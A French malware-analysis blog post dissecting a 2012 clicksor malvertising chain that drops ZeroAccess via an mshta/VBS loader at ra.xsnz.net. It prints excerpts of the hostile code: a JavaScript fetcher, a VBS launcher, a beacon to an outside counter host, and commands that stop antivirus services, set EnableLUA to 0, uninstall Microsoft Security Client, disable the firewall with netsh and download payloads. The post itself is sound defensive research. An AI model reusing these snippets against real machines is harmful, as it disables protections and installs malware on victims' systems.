Malvertising clicksor et http://ra.xsnz.net/cod/srun

Voici une malvertising assez interressant et plus élabroée qu’un simple TDS qui redirige vers un Exploit Kit.
Le procédé est pas nouveau car je l’avais déjà rencontré par le passé, il y a vraiment longtemps.
Une requête sur « cod/srun » sur Google retourne des dates de 2010.

Celle-ci fait un retour via clicksor sur les sites de streaming depuis quelques jours.
Voici un aperçu du fonctionnement.

Cela débute par une alerte Java.

puis une alerte wmiprvse.exe qui modifie les accès au pare-feu Windows.
wmiprvse.exe ça sent donc le VBS.

puis plus tard, les binaires se lancent – il y en a en tout 3 :

 

Comment cela fonctionne ?

C’est la page ra.xsnz.net/cod/srun qui est contacté en premier et qui lance mshta (<hta:application>) suivi d’un Javascript :

Le Javascript donne ceci, c’est lui qui permet le GET suivant :

var xobj, response;

if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }

if(!xobj) { try{ xobj = new ActiveXObject(« Microsoft »+ ».XMLHTTP »); }catch(e){} }

if(xobj) {

xobj.open(« GET », « /cod/srun?req », false);

xobj.setRequestHeader(« Request », « srun,146013498″);

xobj.send(null);

response = xobj.responseText;

}

if(response.length) {

e(e(response, 0, 3), 1, 0, 2);

} else {

self.moveTo(3000, 3000);

self.opener =  » « ;

self.close();

}

confirmé par Process Explorer :

Le résultat du GET est une suite de caractère.

La suite du caractère ASCII est en hexa (voir capture plus bas – je le récupère par du PHP) qui retourne du base64.
On obtient alors le script VBS d’où le fameux wmiprvse.exe plus haut.

Le script est disponible ici : http://pjjoint.malekal.com/files.php?read=20120723_e10x9w15u10g6

Le script VBS est assez interressant.
Les fonctions appelées sont encodées en hexa, surement pour bypasser les détections antivirus.

Voici le code PHP pour récupérer les fonctions :

On retrouve la commande cmd qui se charge de lancer les binaires:

If VarType(wobj) = vbObject Then
wobj.run « cmd /c start «  » » » «  » » & eloc & «  » »  » & param, 0
ElseIf VarType(eobj) = vbObject Then
eobj.ShellExecute « cmd »,  » /c start «  » » » «  » » & eloc & «  » »  » & param, «  », « open », 0
End If

Il y a une fonction pour toper un compteur (pour avoir le nombre de machines infectées).
Function Count(id)
Dim ig
Set ig = Document.createElement(« img »)
ig.src = « http://fc.webmasterpro.de/as_noscript.php?name= » & id
il.style.display = « none »
Document.body.appendChild ig
End Function

 » COUNT
Call Count(« m »)

 

On peux aussi voir que le VBS tente d’arreter les services antivirus.
La liste des services étant offuqué via les variables sNameList et pNameList

 » #1
StopServices decodeBase64(sNameList)
 » #2
StopProcesses decodeBase64(pNameList)
 » #3
Call ClearInternetCache
 » #4
WriteREG « HKLM », « SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System », « DWORD », « EnableLUA », 0
 » #5
ExecuteCMD « Microsoft Security Client\setup.exe », « /u /s », « PROGRAMFILES », 1, 1
 » #6
ExecuteCMD « Netsh », « firewall set opmode disable », «  », 0, 0

 

Les URLs sont encodées avec les pages, paramètres etc :

Dim nbasen, nsorce, nspara, nnames, r
nbasen = Unescape(« %68%74%74%70%3a%2f%2f%72%61%2e%78%73%6e%7a%2e%6e%65%74%2f%67%65%74%3f%73%72%63%3d »)
nsorce = Split(Unescape(« %78%73%65%2c%74%62%61%72%73%6e%65%74%2c%69%6e%63%7a%73%6e%65%74 »), « , »)
nspara = Split(Unescape(« %2d%69%2c%2c »), « , »)
nnames = Split(« nwxecsaomr,ecosawrxnm,awmrceoxns », « , »)

Les GET qui récupèrent les binaires, le serveur retourne toujours le binaire de manière encodé  :

http://ra.xsnz.net/get?src=xse
http://ra.xsnz.net/get?src=tbarsnet
http://ra.xsnz.net/get?src=inczsnet

 

 

Côté source de la malvertising, comme dit plus haut c’est toujours clicksor.
Voici toutes les URLs utilisées:

http://s1.azocemsx.net/sv/sv?aid=04&pid=3177 (85.17.162.216)
http://img.cowzn.net/sv/sw?aid=04&cid=1494038&tid=318788498&pid=3177
http://img.cowzn.net/sv/display.js (85.17.162.216)
http://img.cowzn.net/sv/a.class (85.17.162.216) <= alerte Java
http://ra.xsnz.net/cod/srun (95.211.30.57)
http://ra.xsnz.net/get?src=incosnet (95.211.30.57)

La bannière, l’image est hébergée chez firstload.de

Les informations sur les domaines sont identiques :

Domain Name: COWZN.NET
Registrar: MONIKER ONLINE SERVICES, INC.
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com
Name Server: NS1.MONIKERDNS.NET
Name Server: NS2.MONIKERDNS.NET
Name Server: NS3.MONIKERDNS.NET
Name Server: NS4.MONIKERDNS.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 08-feb-2012
Creation Date: 08-feb-2012
Expiration Date: 08-feb-2013

Registrant [3782436]:
Moniker Privacy Services COWZN.NET@monikerprivacy.net
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Domain Name: XSNZ.NET
Registrar: MONIKER ONLINE SERVICES, INC.
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com
Name Server: NS1.MONIKERDNS.NET
Name Server: NS2.MONIKERDNS.NET
Name Server: NS3.MONIKERDNS.NET
Name Server: NS4.MONIKERDNS.NET
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 03-jun-2012
Creation Date: 03-jun-2012
Expiration Date: 03-jun-2013

Domain Name: XSNZ.NET
Registrar: MONIKER

Registrant [3855444]:
Moniker Privacy Services XSNZ.NET@monikerprivacy.net
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069

 

Enfin côté malware, on a du

Les binaires sont bien entendu mis régulièrement à jour afin de bypasser les détections antivirus.

Une malvertising assez originale et interressant au niveau du fonctionnement.

EDIT 27 Mars 2013

Retombé dessus via l’adresse http://r.xznx.net/cod/srun (95.211.174.14)

malvertising_xznx malvertising_xznx2

La détection est bonne pour ce dropper de ZeroAccess : http://malwaredb.malekal.com/index.php?hash=db3ea4798246098ed48c9d082bfdf23e

https://www.virustotal.com/fr/file/3b172090ed88540abaae99efe87e4d6b38d0ca8914706eae9482ab97f5586b3a/analysis/
SHA256: 3b172090ed88540abaae99efe87e4d6b38d0ca8914706eae9482ab97f5586b3a
Nom du fichier : db3ea4798246098ed48c9d082bfdf23e
Ratio de détection : 28 / 43
Date d’analyse : 2013-03-27 17:40:37 UTC (il y a 8 minutes)

AhnLab-V3 Backdoor/Win32.ZAccess 20130327
AntiVir TR/Rogue.kdz.11919.2 20130327
Avast Win32:Sirefef-AYP [PUP] 20130327
AVG Generic_r.CBA 20130327
BitDefender Trojan.Generic.KDZ.11919 20130327
CAT-QuickHeal (Suspicious) – DNAScan 20130327
ESET-NOD32 a variant of Win32/Kryptik.AXMD 20130327
F-Secure Trojan.Generic.KDZ.11919 20130327
Fortinet W32/ZeroAccess.B!tr 20130327
GData Trojan.Generic.KDZ.11919 20130327
Ikarus Trojan.SuspectCRC 20130327
Kaspersky Backdoor.Win32.ZAccess.bruo 20130327
Kingsoft Win32.Hack.ZAccess.br.(kcloud) 20130325
Malwarebytes Rootkit.0Access.ED 20130327
McAfee ZeroAccess-FAZE!DB3EA4798246 20130327
McAfee-GW-Edition ZeroAccess-FAZE!DB3EA4798246 20130327
Microsoft Trojan:Win32/Meredrop 20130327
MicroWorld-eScan Trojan.Generic.KDZ.11919 20130327
NANO-Antivirus Trojan.Win32.ZAccess.bllscs 20130327
Norman Troj_Generic.JDGOP 20130327
nProtect Trojan/W32.Agent.185856.NV 20130327
Panda Trj/Genetic.gen 20130327
PCTools HeurEngine.ZeroDayThreat 20130327
Rising – 20130322
Sophos Mal/EncPk-ACO 20130327
SUPERAntiSpyware Trojan.Agent/Gen-ZeroAccess 20130327
Symantec Suspicious.Mystic 20130327
TrendMicro-HouseCall TROJ_GEN.RC1CECQ 20130327
VIPRE Lookslike.Win32.Sirefef.b!ag (v) 20130327

malvertising_xznx3

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 21 times, 1 visits today)

2 thoughts on “Malvertising clicksor et http://ra.xsnz.net/cod/srun

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *